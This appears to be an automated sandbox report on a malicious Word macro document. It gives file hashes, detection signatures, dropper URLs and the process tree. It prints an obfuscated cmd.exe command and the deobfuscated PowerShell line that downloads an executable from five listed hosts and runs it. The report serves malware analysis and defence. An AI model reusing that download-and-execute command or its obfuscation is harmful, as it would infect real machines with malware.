Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    138s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/05/2024, 21:08

General

  • Target

    7e6980371f32c621d20998ef8e211bac_JaffaCakes118.doc

  • Size

    66KB

  • MD5

    7e6980371f32c621d20998ef8e211bac

  • SHA1

    593532859a14a3cd2f46eba73f5398641544d551

  • SHA256

    6ccd4c745fb1d6d9e1629b3eb80fc7e8286c902e3629f59a3677d3b9375497e0

  • SHA512

    5a328991d18a379fc5606b757cd7c9c3da2500bc4ae7ac0d33401b1bb0d51ecbff2cb02adf5b4239807a1460b58dee4127e79383cd93724d708da797e60b1364

  • SSDEEP

    768:BpJcaUitGAlmrJpmxlzC+w99NBs+1owTRj5EnAYspPZiFfqPd:BptJlmrJpmxlRw99NBs+awly9spPZO

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://laschuk.com.br/C7f65h8p

exe.dropper

http://jobarba.com/wp-content/nY7NWG7z

exe.dropper

http://familiekoning.net/YT9gzKUs

exe.dropper

http://www.ultigamer.com/wp-admin/includes/OCklr3Q

exe.dropper

http://fluorescent.cc/ttQoKkJ4sC

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7e6980371f32c621d20998ef8e211bac_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1472
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /V^:/C"^se^t ^3^s^H= ^ ^ ^ ^ ^ }^}{hctac}^;^kaerb^;q^jV$ ^metI-e^kovn^I^;)^qjV^$ ^,r^YC^$(^eli^Fdaoln^w^o^D.Vn^F^$^{yrt{)^T^wi$^ n^i^ rYC^$(^hc^a^erof^;'^e^xe.^'+^B^d^Y^$+'^\^'+c^ilbu^p^:vn^e$^=^qjV$^;^'8^4^3'^ =^ B^dY$;)'^@'(^t^i^lpS^.'Cs^4Jk^K^oQt^t/cc.^tn^ec^seroulf//^:^p^tt^h^@Q3rl^kCO/^sedulcn^i/n^i^md^a-^pw/^m^oc.re^mag^i^t^l^u^.^w^ww//^:^p^tt^h@^s^UKz^g^9^TY/^ten.gnino^ke^i^li^m^a^f//:^p^tt^h^@z^7^G^WN7^Yn/^tn^etnoc^-pw/^m^oc^.a^br^a^b^o^j//^:ptth^@^p8h5^6f^7C/rb^.m^oc.k^u^hcsal//:^p^tth'^=T^wi$^;tneilC^be^W^.^teN ^tcejb^o-wen^=VnF$ ^ll^e^h^sr^ewo^p&&f^or /^L %^g ^in (^3^9^7^;^-1;^0)^d^o s^et ^K^3^X^e=!^K^3^X^e!!^3^s^H:~%^g,1!&&^if %^g ^l^e^q ^0 c^a^l^l %^K^3^X^e:~^-3^9^8%"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:5052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $FnV=new-object Net.WebClient;$iwT='http://laschuk.com.br/C7f65h8p@http://jobarba.com/wp-content/nY7NWG7z@http://familiekoning.net/YT9gzKUs@http://www.ultigamer.com/wp-admin/includes/OCklr3Q@http://fluorescent.cc/ttQoKkJ4sC'.Split('@');$YdB = '348';$Vjq=$env:public+'\'+$YdB+'.exe';foreach($CYr in $iwT){try{$FnV.DownloadFile($CYr, $Vjq);Invoke-Item $Vjq;break;}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4312

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ccpgyujh.3gn.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl

    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Public\348.exe

    Filesize

    114B

    MD5

    e89f75f918dbdcee28604d4e09dd71d7

    SHA1

    f9d9055e9878723a12063b47d4a1a5f58c3eb1e9

    SHA256

    6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023

    SHA512

    8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

  • memory/1472-30-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-542-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-5-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-8-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-7-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-6-0x00007FFE653A0000-0x00007FFE653B0000-memory.dmp

    Filesize

    64KB

  • memory/1472-9-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-10-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-11-0x00007FFE653A0000-0x00007FFE653B0000-memory.dmp

    Filesize

    64KB

  • memory/1472-12-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-13-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-0-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/1472-31-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-567-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-2-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/1472-3-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/1472-1-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/1472-522-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-541-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-4-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/1472-543-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-563-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/1472-566-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/1472-565-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/1472-564-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/4312-38-0x00000175A6360000-0x00000175A6382000-memory.dmp

    Filesize

    136KB